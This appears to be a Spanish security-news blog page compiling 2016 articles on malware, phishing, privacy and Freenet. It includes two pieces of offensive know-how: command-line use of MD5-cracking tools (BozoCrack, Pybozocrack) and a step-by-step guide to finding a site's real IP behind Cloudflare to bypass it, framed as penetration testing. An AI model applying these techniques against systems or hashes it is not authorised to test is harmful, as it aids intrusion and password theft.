MD5 es actualmente uno de los hashes más inseguros, y no se recomienda en absoluto su utilización en servicios online ni tampoco en local debido a su facilidad de romperlo y a sus colisiones. Hoy os traemos una forma fácil y rápida de crackear hashes MD5 sin necesidad de tener una potente CPU o GPU para realizar este proceso, ya que este script Bozocrack se encargará de buscarlo en Google si no le pasamos un diccionario.


bozocrack_md5



Bozocrack


Esta herramienta que está escriba en Ruby nos permite crackear hashes MD5 sin necesidad de consumir recursos en el sistema. En lugar de utilizar rainbow tables, diccionarios o por fuerza bruta, esta herramienta simplemente busca el hash MD5 en Google e intenta descubrir cuál es su contraseña. Si el hash aparece en la primera página de resultados, el script nos mostrará la contraseña a la que pertenece a través del terminal.


La forma de utilización es realmente sencilla ya que simplemente debemos ejecutarlo y pasarle en un fichero de texto todos los hashes que queremos crackear:








1ruby bozocrack.rb my_md5_hashes.txt



Si el fichero que introducimos por consola no cumple con el formato especificado, BozoCrack automáticamente intentará buscar la cadena hash MD5 en el fichero, es recomendable que cada línea no contenga más de un hash.


En la página web oficial de BozoCrack en GitHub tenéis todos los detalles sobre esta herramienta y también su enlace al código fuente y a la descarga.



Pybozocrack


Esta herramienta es muy parecida a BozoCrack pero en lugar de estar escrita en Ruby, está escrita en Python. Pybozocrack también se encargará de buscar la contraseña del hash MD5 en un fichero de texto plano, la forma de funcionamiento es exactamente igual al anterior, debemos pasarle los hash a través de un fichero de texto.








1pybozocrack -f my_md5_hashes.txt



Otra forma de funcionamiento es pasándole el hash MD5 directamente, de esta forma no tendremos que crear un fichero de texto, simplemente pasándole dicho hash empezará a buscarlo.








1pybozocrack -s fcf1eed8596699624167416a1e7e122e



Este programa Pybozocrack está disponible en los paquetes oficiales de Python, por lo que podremos descargarlo e instalarlo fácilmente.


Os recomendamos acceder a nuestra sección de seguridad informática donde encontraréis más información sobre algoritmos criptográficos y programas para crackear contraseñas.


Fuente:http://www.redeszone.net/


Noticias de seguridad informática

¿Cómo evitar fácilmente Cloudflare y hacer pruebas de penetración?

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/importantes/como-evitar-facilmente-cloudflare-y-hacer-pruebas-de-penetracion/
TAGS: Cloudflare hack, hackear cloudflare
Cloudflare ayuda en seguridad en sistemas informáticos. Cloudflare ejecuta automáticamente una comprobación de integridad en un navegador para todas las peticiones al sitio web mediante la evaluación de los encabezados HTTP de las bases de amenazas. Si se encuentra una base de amenazas, la solicitud se le negará, el usuario puede establecer la configuración de seguridad deseada para su sitio y luego a la red CloudFlare detiene las amenazas antes de que llegue sitio web mencionan expertos de servicios de pruebas de penetración.

Todo lo que podemos entender es que Cloudflare puede convertirse en un dolor, mientras hace la penetración de la prueba de un sitio web, por otro lado si Cloudflare establece con éxito el proxy sobre IP del servidor real del sitio web, se cerrará la superficie de ataque de la pruebas de penetración también.

Así que para pasar por alto Cloudflare podemos utilizar algunos trucos, que en realidad se producen debido a algunas configuraciones erróneas por parte del administrador de seguridad en sistemas informáticos.

Antes de empezar hay que saber cómo encontrar si un sitio web está utilizando CloudFlare. Para que podamos ver los servidores de nombres de un sitio web y ver si son de CloudFlare o no. Los expertos de servicios de pruebas de penetración les vamos a enseñar cómo hacerlo.

Por ejemplo vamos a utilizar nuestro objetivo, en primer lugar vamos a hacer ping y comprobar la dirección IP que está mostrando.

Cloudflare hack

 

Puede la dirección IP muestra en el navegador y verás el error de página de CloudFlare.

 

hackear cloudflare

 

De otro modo, puede consultar los nameservers utilizando DIG.
hackear cloudflare

 

Tú puedes ver claramente los Nameservers de Cloudflare por allí. Así que ahora tenemos que obtener la dirección IP real para esquivar a CloudFlare.

El primer sitio web que podemos usar para obtener la dirección IP real es CloudFlare-watch, este sitio mantiene una base de datos de la dirección IP reales de sitios web que están utilizando CloudFlare. En la parte inferior de la página web aparecerá una opción para entrar en el dominio del que quieres obtener la dirección IP real. Introduzca el dominio y haga clic en búsqueda.

 

hackear cloudflare

 

Aquí puedes ver el dirección IP real de la página web, pero en algunos casos la dirección IP real no está disponible, se puede más con nuestro segundo sitio web que es http://1337.cl/, este sitio web le permite utilizar 4 métodos para obtener la dirección IP real de un sitio web y hackear seguridad en sistemas informáticos:

 

hackear cloudflare

Aquí se puede ver la dirección IP real de la página web, pero en algunos casos si no funciona, entonces podemos pasar a nuestro tercer sitio web que es Netcraft. Según expertos de servicios de pruebas de penetración este sitio mantiene registros de historia de alojamiento para otros sitios web. Así que si usted es afortunado usted puede obtener la dirección IP real de su sitio web de destino allí. Introduzca su sitio web de destino en el cuadro de texto y pulse Intro. En el historial de alojamiento se encuentra el más antiguo IP del objetivo que podría ser su dirección IP actual oculta.

hackear cloudflare

 

Una vez que encontrar la dirección IP real de ve a tu c: \ windows \ system32 \ drivers \ etc \ editar el archivo "hosts" y haz una entrada DNS como se muestra a continuación.

 

hackear Cloudflare

Y guardar el archivo. Ahora, cualquier solicitud al sitio web de destino directamente será remitida al servidor real y Cloudflare será automáticamente anulado por cualquier herramienta o el navegador que utilice. De esta manera se puede felizmente hace una prueba de penetración y ejecutar exploraciones en contra de tu sitio web objetivo y seguridad en sistemas informático explican los expertos de servicios de pruebas de penetración.

 

Método 2


También se puede hackear Cloudflare y obtener la dirección IP real del servidor DNS.

En realidad vamos a comprobar todas las entradas DNS y luego los subdominios. Lo que pasa es que muchas veces se olvida la administración para transferir todos los subdominios correctamente al servidor CloudFlare y muchas veces algunas entradas MX u otras entradas pueden ser dejadas. Que hará que se revele la dirección IP mencionan expertos de servicios de pruebas de penetración.

Vamos a revisar los registros DNS para el sitio web objetivo y ver si podemos causar una brecha de seguridad en sistemas informático.

 

hackear cloudflare

 

Aquí se puede observar que una entrada de MS sospechosa "dc-329b0f0f-mail.tv.com.pk", ahora intenta hacer ping y se le volverá a obtener la dirección IP real de la página web. De esta manera puedes consultar todas las entradas DNS y ver si alguna de ellas todavía se está resolviendo directamente con la dirección IP real. Foca o Fierce también se pueden utilizar para enumerar subdominios y luego encontrar la dirección IP real usándolos.

 

Hackear Cloudflare

 

Método 3


Otro método para pasar por alto a Cloudflare y romper la seguridad en sistemas informático, es atacando el servidor de correo electrónico.

Lo que queremos es simplemente un correo electrónico de la página web, ya que con el correo electrónico también vamos a obtener la dirección IP real de la página web, según expertos de servicios de pruebas de penetración. Envíe un correo a nombrefalso@sitioobjecitivo.com tu podrás obtener un error de la dirección IP real, revisa el correo de error haz clic en "Mostrar original" y luego busca "Google intentó entregar su mensaje, pero fue rechazado por el servidor para el destinatario dominio sitioobjecitivo.com por sitioobjecitivo.com. []. "en el texto. Esta dirección IP será la dirección IP real de la página web.

 

hack cloudflare

Este artículo es sólo para fines educativos.
Noticias de seguridad informática

Bart, un nuevo ransomware que cifra los archivos de los usuarios

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/malware-virus/bart-un-nuevo-ransomware-que-cifra-los-archivos-de-los-usuarios/
TAGS: nuevo ransomware, ransomware called “Bart”

Nueva semana y de nuevo un nuevo ransomware del que tenemos que hablar. Los ciberdelincuentes están distribuyendo Bart ayudándose de correos electrónicos spam. No es casualidad que esto coincida con la vuelta de Locky y su botnet, ya que este posee una gran cantidad de similitudes con respecto a su hermano mayor.


De entrada hay que decir que no es igual de sofisticado que su hermano mayor, pero sí que permite llevar a cabo un daño similar a este. Ni que decir tiene que su funcionamiento es idéntico al del resto de amenazas del mismo tiempo, llevando a cabo el cifrado de la información y solicitando posteriormente el pago de una suma de dinero para proceder al desbloqueo de esta.


Aunque comparta cosas con respecto a s hermano mayor, hay que decir que la forma de difusión dista mucho. Sí que es verdad que utiliza el correo electrónico para llevar a cabo la distribución y que el usuario se encuentra con un archivo comprimido como adjunto. Sin embargo, a partir de este momento todo cambia, ya que de entrada no se produce la descarga directa del ejecutable sino de un archivo JavaScript que a su vez servirá para descargar RockLoader. Es decir, se realiza instala en el sistema un software intermedio que servirá para en primer lugar comprobar el sistema y la existencia de herramientas de seguridad. Una vez que se ha comprobado esto se produce la descarga de la amenaza que nos ocupa, buscando de alguna forma evitar que el ransomware Bart sea objeto de análisis.


bart ransomware comienza a afectar a usuarios



Bart posee modo offline


Todas las amenazas de este tipo tienen la necesidad de estar en contacto con un servidor de control para proceder al cifrado de los archivos y el posterior envío de la clave. Sin embargo, en la amenaza que nos ocupa esto no funciona así y no existe ningún tipo de negociado con el servidor de control para realizar el cifrado de la información, configurándose como un proceso que se lleva a cabo de forma local.


Otra diferencia con respecto a Locky es su cifrado, ya que este no es muy robusto. Sin embargo, la cantidad de dinero demandada para recuperar el acceso a los archivos es de nada más y nada menos que 1.500 dólares, o lo que es lo mismo 3 Bitcoins.


Por el momento los usuarios afectados se encuentran en Alemania, Polonia, Reino Unidos y Francia, pero ya se sabe que con Internet como aliado de los ciberdelincuentes el número de equipos afectados aumentará en los próximos días.


Fuente:http://www.redeszone.net/


Noticias de seguridad informática

Nuevos fallos de seguridad en Uber dejan expuesta información

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/hacking-incidentes/nuevos-fallos-de-seguridad-en-uber-dejan-expuesta-informacion/
TAGS: uber

No es le primera vez y parece que no será la última que tengamos que hablar de un problema de seguridad en el servicio. Los responsables de Uber fueron alertados la pasada semana y aún están buscando la forma de solucionar algunos fallos que dejan expuestos los datos de los conductores y de los usuarios del servicio.


Desde la empresa de seguridad encargada de informar de los problemas no han querido entrar en detalles y solo han revelado algunos de 6 de los 14 problemas detectados en total. Evidentemente el hermetismo responde a no dar pistas a ciberdelincuentes de cómo hacer uso de estas vulnerabilidades, aunque tal vez no haga falta.


Aunque no está confirmado, algunas especulaciones hablan de que algunos de estos fallos ya se habrían aprovechado para acceder a información del servicio de forma no autorizada.



Activar promociones en Uber de forma no autorizada


Lo que sí que han indicado es que podría suceder de hacer uso de estas. En primer lugar los responsables del servicio han comprobado que existen códigos de promociones activados de forma no autorizada, coincidiendo con la información indicada por los expertos en seguridad responsables del descubrimiento.


uber nuevo fallo de seguridad


Pero esta no es la única acción llevada a cabo de forma no autorizada, ya que algunos barajan que se hayan producido accesos no autorizados haciendo uso de la aplicación disponible para dispositivos, obviamente sin indicar el método para evitar que el daño sea mayor.


Pero esto no es la único destacable, ya que desde la firma de seguridad encargada de realizar el reporte han concretado que también se han detectado conductores que se han añadido al servicio de forma no autorizada.


En definitiva, no se trata de un fallo de seguridad aislado y son nada más y nada menos que 14 que permiten el manejo de la información y la modificación de la misma de forma no autorizada. Los expertos informan que muchas vulnerabilidades están relacionadas y que llevar a cabo uno implica disponer de acceso a otra.


Fuente:http://www.redeszone.net/


Noticias de seguridad informática

Sunday 26 June 2016

Este malware puede robar datos de tu ordenador usando… los ventiladores

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/hacking-incidentes/este-malware-puede-robar-datos-de-tu-ordenador-usando-los-ventiladores/
TAGS: Malware, TV, Wi-Fi

Un nuevo malware que controla los ventiladores puede ser usado para robar datos sin necesidad de conexión a Internet.


El chiste siempre es el mismo cada vez que en una serie de TV los protagonistas son atacados por un hacker y se dedican a teclear furiosamente mientras sueltan vocabulario mínimamente relacionado: “¿Por qué no desconectan el cable?”


Una vez que desconectas el cable de red o quitas la Wi-Fi, ya no tienes acceso a Internet y por lo tanto los atacantes ya no pueden hacer nada, ¿verdad? Excepto que no es tan simple, y en la vida real muy raramente verás un “enfrentamiento” contra un hacker como ese.



El arte de conseguir datos sin una conexión directa


Los hackers actuales se están especializando en entrar en nuestros sistemas sin que nos demos cuenta y más importante, sin que sea necesaria una conexión directa. Desde usar los altavoces para mandar mensajes a distancia, hasta grabar nuestras conversaciones usando el giroscopio de nuestro móvil, todos estos ataques indirectos sortean las “impenetrables” defensas de nuestros sistemas.


El último caso de ataque indirecto demuestra hasta qué punto es posible usar la picaresca para robar datos. Supongamos que tenemos un ordenador aislado, no está conectado a Internet, no tiene altavoces ni pantalla, no tiene ningún método para que un posible atacante acceda o vea los datos.


Y sin embargo, es relativamente fácil conseguirlo, aprovechándose de algo que tienen la mayoría de ordenadores: los ventiladores. 



Así funciona el malware que controla los ventiladores


Así lo han demostrado investigadores de la Universidad Ben Gurion en Israel, que han desarrollado un tipo de malware (pdf) que, una vez llega al sistema (a través de USB, por ejemplo), es capaz de controlar la velocidad de los ventiladores instalados en el ordenador.


malware ventiladores 2


Una vez que el malware se instala en el sistema, encuentra los datos que quiere robar y empieza a mandar un mensaje al exterior cambiando la velocidad de los ventiladores y de la CPU, creando ondas acústicas que pueden ser escuchadas y analizadas por un dispositivo cercano.


malware ventiladores 3


Es un medio de comunicación similar al código morse, aunque eso supone que no es muy veloz: los investigadores consiguieron obtener datos con una tasa de transferencia de 900 bits por hora. Desde luego no vas a descargarte películas de esa manera, pero si conoces los datos concretos que buscas y sabes dónde están guardados, puedes obtenerlos en un periodo de tiempo factible.


malware ventiladores 1


Claro, que el método tiene sus puntos negativos. No sólo hay que meter el malware con un USB en el ordenador aislado (lo que necesitará de mucha ingeniería social), sino que el dispositivo de escucha tiene que estar a una distancia máxima de 8 metros durante las horas que dure la transferencia.


Arriesgado, pero posible, así que si eres el responsable de un ordenador importante puede que a partir de ahora tengas que fijarte en su los ventiladores tienen un ritmo raro.


Fuente:http://neandergeek.mx/


Noticias de seguridad informática

Saturday 25 June 2016

Netflix se puede piratear debido a un fallo en Chrome

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/hacking-incidentes/netflix-se-puede-piratear-debido-un-fallo-en-chrome/
TAGS: Google Chrome, propio Netflix

Netflix ha conseguido que muchos usuarios hayan dejado de descargar películas y series por medios ilegales en Internet, pero ahora el propio Netflix se puede piratear a causa de una vulnerabilidad en Google Chrome. Es decir, se pueden copiar y descargar sus contenidos en nuestro ordenador. Por lo tanto, re[PHEsultará muy fácil que luego se suban a sitios dedicados a compartir archivos.


Ya sabemos que Netflix tiene un catálogo muy interesante, y si usamos el navegador Chrome lo recibimos por medio de Widevine EME/CDM, una tecnología que evita que se pueda copiar el vídeo. Por desgracia, los investigadores David Livshits y Alexandra Mikityuk informaron el 24 de mayo de un fallo en Chrome que permite que los usuarios pirateen las películas y series, guardando el vídeo según se reproduce.


Safari y Opera también usan este sistema de protección, pero los investigadores no han encontrado fallos en ellos... aunque tampoco descartan que lo consigan. Por su parte, Internet Explorer, Microsoft Edge y Safari no emplean Widevine EME/CDM, así que no estan afectados.


Te interesa:Comparamos los principales servicios de streaming en España


A Google le quedan dos meses para corregir el error de Chrome con Netflix, ya que los descubridores han decidido que lo harán público a los 90 días de haberlo comunicado. Es lo mismo que hace Google cuando encuentra fallos en el software de terceros, así que parece lo justo. Por ahora no se han facilitado los detalles de cómo explotar la vulnerabilidad, pero sí que se han demostrado su funcionamiento en este vídeo:


https://www.youtube.com/watch?v=5CkWjOvpZJw

Google no ve clara la solución


El problema de Chrome no solo se puede aprovechar en Netflix, también permite descargar contenidos de rivales como Amazon Video, que aún no ha llegado a España, pero se está volviendo popular en Estados Unidos. Por ahora no se ha lanzado un parche, aunque Google ya ha aclarado que todos los navegadores basados en Chromium están afectados.


Así que Netflix es la más perjudicada por este problema. No le gustará nada que el vídeo que manda a Chrome se pueda interceptar y ser subido a sitios dededicados a la piratería. Esperemos que el problema se resuelva lo antes posible, porque puede poner en un aprieto al servicio de streaming.


¿Qué opinas de este tema? ¿Crees que ahora veremos más piratería de las series y películas de Netflix, o que no se notará mucho la diferencia?


Fuente:http://www.elgrupoinformatico.com/


Noticias de seguridad informática

CloudFlare Watch, la plataforma en contra de la protección igualitaria del CDN

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/tecnologia/cloudflare-watch-la-plataforma-en-contra-de-la-proteccion-igualitaria-del-cdn/
TAGS: CDN, CloudFlare, DNS

PIR, acrónimo de “Public Information Research”, es un proyecto que busca investigar a los grandes proveedores de servicios de Internet de manera que cualquier usuario de la red pueda saber si estos actúan de buena manera o, tras unas bonitas palabras, en realidad las prácticas que llevan a cabo no son tan buenas como deberían. Este proyecto ya ha realizado en el pasado campañas similares como NameBase, Google-Watch y Scroogle demostrando cómo estas plataformas, más que ayudar a un Internet más fiable, en realidad evitaban un internet más anónimo, privado e inseguro.


Desde hace dos años, PIR ha estado investigando a CloudFlare, el conocido y prestigioso CDN. Gracias a esta plataforma, los servidores que se ocultan tras su nube protegen su IP para evitar que piratas informáticos puedan atacarlos directamente (incluso el DNS resuelve una IP propiedad de CloudFlare) y, a la vez, oculta la IP de los visitantes de la plataforma, quedando absolutamente todo dentro del CND y protegiendo, al menos en teoría, la información y la seguridad tanto de administradores como de visitantes.


CloudFlare tiene, en total, 391 nameservers y, a cada web asociada a la plataforma se le asignan dos diferentes, siendo muy sencillo poder saber qué webs están ocultas tras CloudFlare y cuáles no. Aunque las ventajas de utilizar un CDN como este son considerables, sobre todo en cuanto a seguridad, también hay una serie de peligros de los que intenta hacer eco esta plataforma.


Logo-CloudFlare



CloudFlare trata por igual a todos sus usuarios, independientemente de sus intenciones


La principal queja de CloudFlare Watch es que el CDN, CrimeFlare como ellos lo llaman, protege por igual a todo tipo de webs, plataformas y servicios sin importantes su finalidad. Por ello, igual que un periódico puede ocultarse tras dicha nube naranja, piratas informáticos, ataques DDoS, trolls e infractores de copyright también se ocultan allí y, los responsables del CDN, no actúan en contra de ellos. Un ejemplo de esto lo hemos visto hace poco tiempo cuando varias webs relacionadas con ISIS se ocultaron en los nameservers de CloudFlare y la compañía les permitió permanecer allí mientras pagaran las facturas.


Además, esta plataforma acusa a CloudFlare se ser una plataforma opaca. No se sabe si sus responsables nos espían, no se sabe si hay algo más en medio entre el servidor y el CDN ni si están controlando todas las conexiones. Tampoco se sabe dónde están exactamente todos los dominios ni los nameservers. el CDN ofrece seguridad, sí, pero según los responsables de PIR, a un precio muy elevado (a pesar de que cualquier web puede ocultarse de forma gratuita tras su nube).


Los responsables de CloudFlare Watch aseguran que el éxito y gran crecimiento de CloudFlare no es nada bueno para Internet. Por ello anima a los usuarios a boicotear, como sea posible, a dicho CDN y, además, a hacer eco de su movimiento.


Desde RedesZone creemos que CloudFlare Watch exagera los hechos. Es más, es cierto que protege por igual a piratas informáticos, terroristas y a usuarios convencionales, sin embargo, si no lo hiciera, la plataforma estaría favoreciendo a cierto público, algo que, si pretende tratar a todos por igual, no se puede permitir. Además, ante una orden judicial, el CDN sí ha tomado medidas en el pasado y, según ha asegurado su CEO en varias ocasiones, seguirá actuando de la misma manera, pero siempre con órdenes de por medio, no simplemente por la opinión de una mayoría o minoría.


Fuente:http://www.redeszone.net/


Noticias de seguridad informática

Friday 24 June 2016

Descubren campaña de phishing a Bitcoin

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/seguridad-informatica/descubren-campana-de-phishing-bitcoin/
TAGS: Bitcoin

Desde el mes pasado, los atacantes han utilizado una combinación de phishing y secuestro de URL para desarrollar una campaña que busca robar bitcoins y credenciales de acceso a Blockchain.


Se han visto más de 100 dominios falsos de Bitcoin y Blockchain, algunos de ellos simulan ser carteras de bitcoin auténticas. La mayoría de los sitios se registraron el 26 de mayo y algunos de ellos continúan en aumento, lo que sugiere que la campaña está en sus comienzos.


Artsiom Holub, Dhia Majoub y Jeremiah O’Connor, investigadores de OpenDNS Security Labs, rastrearon las conexiones entre las direcciones IP, los servidores de dominio y los indicadores de Whois durante las últimas semanas para determinar el origen de la campaña.


Cyren, una firma de seguridad de Israel, mostró los primeros indicios en junio, cuando observaban el dominio blocklchain[.]info distribuyéndose por medio de una campaña de costo por clic en Google Adwords. Si un usuario era engañado para visitar el sitio, el cual era muy parecido al real, este entregaba sus credenciales de acceso a los atacantes.


Un día después de que Cyren publicara su investigación, OpenDNS fue más a detalle y encontró un ataque a blockchain-wallet[.]top. Al igual que el anterior, el ataque luce extremadamente similar alsitio legítimo de Blockchain, una popular base de datos de transacciones de bitcoins. El sitio, que incluso comparte el mismo logotipo y la barra de navegación de color verde azulado, todavía está activo, pero Google lo ha clasificado como un sitio engañoso, advirtiendo a los usuarios evitando así que los atacantes puedan usarla para conseguir que los usuarios revelen su información personal.




OpenDNS detectó una URL ofuscada de manera similar, blolkchain[.]com, conectada a la misma dirección IP tan sólo unos días después, el 13 de junio. Encontraron docenas de sitios sospechosos, incluyendo varios sitos falsos de Blockchain.


Las direcciones de bitcoin tienen que ser verificadas con Base58Check para evitar confusión entre caracteres como la letra O mayúscula y el número 0.  Tal como lo indican los investigadores, esta es la razón por la cual los sitios basan sus ataques en errores y confusiones de escritura.


Al poner más atención en las direcciones IP, los investigadores descubrieron que todas ellas comparten al mismo proveedor, el cual ha sido acusado previamente de almacenar contenido al que OpenDNS llama “contenido criminal y tóxico”. Algunas compañías desconocidas han utilizado estos servicios para desplegar pornografía infantil, modelaje con menores, mercancía falsa y sitios de phishing relacionados con Blockchain.


Los investigadores relacionaron los servidores de dominio con indicadores Whois para determinar seis correos electrónicos distintos utilizados para registrarse. Aún continúan en uso.


La noticia llega al mismo tiempo que el interés en las criptomonedas se retoma, el precio de los bitcoins ha incrementado asombrosamente en los últimos meses, una tendencia que podría estar relacionada con el incremento del ransomware. Cuando las víctimas de ransomware son atacadas, los pagos se solicitan con mucha frecuencia en bitcoins, en este tipo de situaciones, los usuarios regularmente reciben instrucciones de cómo comprar bitcoins para poder pagar por la recuperación de sus archivos.


Fuente:http://www.seguridad.unam.mx/


Noticias de seguridad informática

Viking Horde, el nuevo troyano que ataca España

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/malware-virus/viking-horde-el-nuevo-troyano-que-ataca-espana/
TAGS: 'Viking Horde', nuevo troyano

La empresa Check Point de ciberseguridad, ha descubierto un nuevo virus troyano, al que han nombrado como Viking Horde. Según explica la empresa en su página oficial, se trata de un malware bastante peligroso. Su mayor actividad ha sido registrada en Rusia, pero el segundo país más afectado por los ataques de este virus es España.


Este malware que han detectado puede afectar a cualquier dispositivo Android, explicó el director de Check Point Iberia, Mario García.


viking horde


El hacker puede tomar el control del dispositivo sin que el usuario se dé cuenta. SegúnCheck Point Iberia, hasta el momento se han comprobado que cinco aplicaciones de la tienda Google Play han sido infectadas por este troyano, entre las que destaca por sus ingresos es Viking Jump, un videojuego de móvil que está entre las apps más populares en varios países, y tiene entre 50.000 y 100.000 descargas.


Las otras cuatro aplicaciones infectadas, menos relevantes y con numerosas calificaciones negativas son, Memory Booster, son Wi-Fi Plus, Simple 2048 y Parrot Copter. Si instalamos cualquiera de estas aplicaciones, el cibercriminal detrás del troyano tiene la capacidad de tomar el control del teléfono y puede robar los datos que desee, como números de tarjeta de crédito o también puede instalar componentes adicionales que puedan otorgarle privilegios de acceso a tu móvil.


Si nuestro dispositivo ha sido hackeado por este troyano, el cibercriminal puede hacer diferentes tipos de fraude



¿Qué hacer en caso de tener el móvil infectado?


Si tenemos instalada alguna de estas aplicaciones que tienen el malware, debemos desinstalarla inmediatamente y comprobar los permisos que tienen nuestras aplicaciones en los ajustes de seguridad del teléfono. Si alguna aplicación tiene marcado poder acceder a los ajustes de sistema, debes desinstalarla lo antes posible. Permisos de modificación del sistema sólo deberían tenerlo las aplicaciones sociales o de streaming de fotos y vídeo. Después de realizar esto, deberías instalar un antivirus, igual que en tu ordenador y este evitará muchos problemas, hay varios gratuitos y con muy buen rendimiento como Avast o AVG.


Fuente:http://tecnoinnovador.com/


Noticias de seguridad informática

Facebook puede saber qué páginas de adultos visitas

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/seguridad-informatica/facebook-puede-saber-que-paginas-de-adultos-visitas/
TAGS: facebook

Facebook hace uso de una potente herramienta de rastreo de sus usuarios para poder construir una telaraña de publicidad lo más personalizada posible y eso, de cierta manera, puede atentar contra la privacidad de cualquier usuario. Pero con la famosa red social las cosas van muy lejos, tanto como para poder rastrear nuestros gustos fuera de Facebook, y eso incluye saber qué páginas de adultos sueles visitar.


Si bien por política de la red social no veremos anuncios de adultos cuando entremos a nuestra cuenta, sí que Facebooknos suele hacer llegar publicidad relativa a unos gustos que los saben gracias a un proceso de rastreo que se ha realizado en los últimos tiempos.


sad-facebook-girl-


¿Recuerdas esos botones de ‘Me Gusta’ que hay en algunas páginas de adultos y que has pulsado creyendo que eran inofensivos? ¿alguna vez te has registrado en alguna web de adultos simplemente accediendo con tu cuenta de Facebook para evitar registrarte de forma manual? Pues ya Facebook sabe qué tipo de página de adultos visitaste y hasta que tipo de porno podría gustarte si alguna vez diste un ‘me Gusta’ a un vídeo subidito de tono.


Y es que Facebook recoge datos de los sitios que visita el usuario, siempre y cuando estas páginas webs tengan instalados algunos botones de la red social o que hagan uso del registro por acceso con Facebook para la entrada de nuevos usuarios.


Sólo hay que leerse  la política de privacidad de datos de Facebook para salir de dudas:“Recopilamos información cuando visitas un sitio de terceros y app que hagan uso de nuestros servicios”, en referencia a esos botones de ‘Me Gusta’ y derivados. “Esto incluye información sobre los sitios y apps que visites y tu uso de nuestros servicios en estos sitios y apps”.


Eso sí, Facebook ha aclarado que este tipo de informaciones se borran 90 días después y que nunca hacen uso de las mismas, pero más vale saber a qué nos atenemos cuando hacemos uso de los servicios de Facebook fuera de la red social.


Fuente:http://computerhoy.com/


Noticias de seguridad informática

¿Móvil hackeado o micrófono en el maletín?

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/hacking-incidentes/movil-hackeado-o-microfono-en-el-maletin/
TAGS: Daniel de Alfonso, Móvil hackeado

Mientras continúan saliendo a la luz las conversaciones entre Fernández Díaz y De Alfonso, los investigadores barajan varias hipótesis.





El responsable de la Oficia Antifrau de Catalunya, Daniel de Alfonso, lleva días asegurando que él no grabó sus conversaciones con el ministro del Interior, Jorge Fernández Díaz, en 2014. Mucho menos que fuera el responsable de filtrárselas a ‘Público’ para su difusión. La investigación está centrada ahora en saber cómo pudieron grabarse las reuniones. La policía judicial maneja varias hipótesis, pero las que parecen tener más fuerza son las que hacen referencia a que De Alfonso tendría su teléfono hacheado o un micrófono pegado en su maletín.


El propio responsable de Antifrau aseguró este jueves que alguien colocó “un micrófono oculto en el despacho oficial del ministro para grabar la conversación entre ambos”. El objetivo sería utilizarlo contra él, porque “al único que perjudica esto es a mi; todo el mundo busca mi cabeza”, aclaró en Antena 3. La teoría de De Alfonso se sustenta en que la conversación se oye con una “nitidez absoluta y eso no se consigue con un móvil”. Además, matizó al decir que él siempre deja su teléfono dentro del maletín cuando está en una reunión.


Hoy el diario ‘La Razón’ señala que los encargados de investigar la filtración han añadido la posibilidad de que “un experto en la materia” colocara micrófono oculto en el maletín de De Alfonso. Aunque para eso habría que investigar quién pudo tener acceso a la cartera del responsable de Antifrau en los días previos a sus reuniones con el ministro. O si, como insinuó ayer De Alfonso en el Parlmanent, alguien entró en su domicilio para instalarle el micrófono. En este punto también sería clave averiguar quién tuvo acceso a la agenda de los interlocutores para saber cuándo se iban a reunir.



Las conversaciones filtradas puede costarle el cargo a De Alfonso
Las conversaciones filtradas puede costarle el cargo a De Alfonso (Quique García / EFE)

Daniel de Alfonso cree también que su móvil fue monitorizado por la Policía Nacional, ya que él mismo lo entregó para que fuera examinado y descartar así que estuviera manipulado. Sin pelos en la lengua sugirió que fueran los policías los que hackearon su teléfono para que ejerciera de micrófono durante sus actos con el ministro.


El diario ‘Público’ asegura tener en su poder dos audios de sus encuentros el 2 y 16 de octubre de 2014. Uno de cuatro horas y otro sólo de dos. Se desconoce por el momento cómo llegaron las grabaciones a su redacción y cuál fue la estrategia para conseguirlas.


Tal y como apuntó ayer ‘La Vanguardia’, en el despacho de Fernández Díaz no hay inhibidores de frecuencia, ni un jarrón donde esconder un micrófono como en las películas de espías. Lo que sí realiza periódicamente es un barrido de seguridad para comprobar que no hay nada extraño en el lugar.



 Fuente:http://www.lavanguardia.com/



Noticias de seguridad informática

Así es Freenet, deep web alternativa a Tor e I2P

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/seguridad-informatica/asi-es-freenet-deep-web-alternativa-tor-e-i2p/
TAGS: Deep Web, Freenet, TOR

Llevamos bastante tiempo rebuscando en las profundidades de la red, en esos Internet alternativos conocidos como Deep Web o Darknet. En el pasado ya os hemos hablado de las redes Tor, I2P, o ZeroNet, pero todavía no le hemos dedicado el tiempo que se merece a otra alternativa que lleva más de 15 años luchando por la privacidad de sus usuarios: Freenet.


Es por eso que hoy vamos a hablaros sobre esta alternativa P2P a la que en su nacimiento se la calificó como sucesora de Napster, y que sirve tanto para el intercambio de archivos como para la creación de foros anónimos y páginas de todo tipo de contenido. Os trataremos de explicar también de dónde viene y cual es su funcionamiento.



¿Qué es y de dónde viene Freenet?



Freenet Logo


Hablar de Freenet es hablar de su creador Ian Clarke, un científico de la computación que en 1999 publicó en la red el que fuera su proyecto de final de carrera, el ensayo "A Distributed Decentralised Information Storage and Retrieval System". En él Clarke describía un algoritmo que, al ser ejecutado por un grupo interconectado de nodos, proporcionaría un robusto sistema de almacenamiento indexado con claves y recuperación sin ningún elemento de control centralizado o administración.


Este sistema permitiría interactuar a sus usuarios de una manera similar a la World Wide Web, pero pudiendo navegar de forma anónima. Vamos, que lo que definía era un sistema "Peer to peer" parecido al de las redes BitTorrent. Al liberar su ensayo Clarke invitó a cualquier voluntario que quisiera a que le ayudase a implementar su diseño, dando como resultado un proyecto de software libre que acabó siendo conocido como Freenet.


La iniciativa llamó enseguida la atención de la prensa especializada. Algunos medios lo interpretaron como una batalla entre desarrolladores y leyes de Copyright, y otros como un intento de recuperar la libertad de expresión. Incluso hubo algunos como laBBC que no dudaron en calificarlo como el hijo y heredero de Napster.




Bbc Freenet


Es inevitable que esta idea de una red P2P nos haga acordarnos de eMule o BitTorrent pero hay una diferencia clave. Una vez compartido el un archivo o actualizada una página en la Freenet, el documento queda insertado en la red, por lo que una vez finalizada la inserción ya no hace falta que el nodo siga operativo para poder acceder al contenido.


